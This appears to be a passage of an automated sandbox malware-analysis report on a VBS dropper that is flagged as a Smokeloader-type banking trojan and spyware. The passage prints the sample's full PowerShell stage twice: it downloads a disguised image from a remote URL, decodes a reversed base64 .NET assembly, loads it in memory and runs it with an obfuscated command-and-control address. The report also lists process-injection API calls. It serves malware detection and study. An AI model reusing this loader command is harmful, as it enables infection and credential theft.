            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00161FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,18_2_00161FE5
            Source: C:\Windows\explorer.exeCode function: 19_2_009E5300 NtUnmapViewOfSection,19_2_009E5300
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_00861016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,20_2_00861016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_00861A80 NtCreateSection,NtMapViewOfSection,20_2_00861A80
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_00861819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,20_2_00861819
            Source: C:\Windows\explorer.exeCode function: 24_2_009E355C NtUnmapViewOfSection,24_2_009E355C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_001B1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,26_2_001B1016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_001B18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,26_2_001B18BF
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_001B1B26 NtCreateSection,NtMapViewOfSection,26_2_001B1B26
            Source: C:\Windows\explorer.exeCode function: 27_2_009D370C NtUnmapViewOfSection,27_2_009D370C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A0219814_2_00A02198
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A0C2F914_2_00A0C2F9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A1B35C14_2_00A1B35C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A5443814_2_00A54438
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A1B97E14_2_00A1B97E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A06E6A14_2_00A06E6A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A25F0814_2_00A25F08
            Source: C:\Windows\explorer.exeCode function: 16_2_009B1E2016_2_009B1E20
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0080170B17_2_0080170B
            Source: C:\Windows\explorer.exeCode function: 19_2_009E2C0019_2_009E2C00
            Source: C:\Windows\explorer.exeCode function: 24_2_009E205424_2_009E2054
            Source: C:\Windows\explorer.exeCode function: 24_2_009E286024_2_009E2860
            Source: C:\Windows\explorer.exeCode function: 27_2_009D2A0427_2_009D2A04
            Source: C:\Windows\explorer.exeCode function: 27_2_009D20F427_2_009D20F4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00A07F70 appears 32 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00A08801 appears 40 times
            Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2508 -s 696
            Source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 5128, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winVBS@27/21@2/2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0080274A CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,CloseHandle,17_2_0080274A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A04440 CoCreateInstance,SysAllocString,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,wsprintfW,14_2_00A04440
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\VBScriptingJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\uahuajdMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3812:120:WilError_03
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2508
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5d5mz2kh.02x.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs"
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 1FA.tmp.14.dr, 400.tmp.14.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbsReversingLabs: Detection: 15%
            Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbsVirustotal: Detection: 13%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\uahuajd C:\Users\user\AppData\Roaming\uahuajd
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2508 -s 696
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
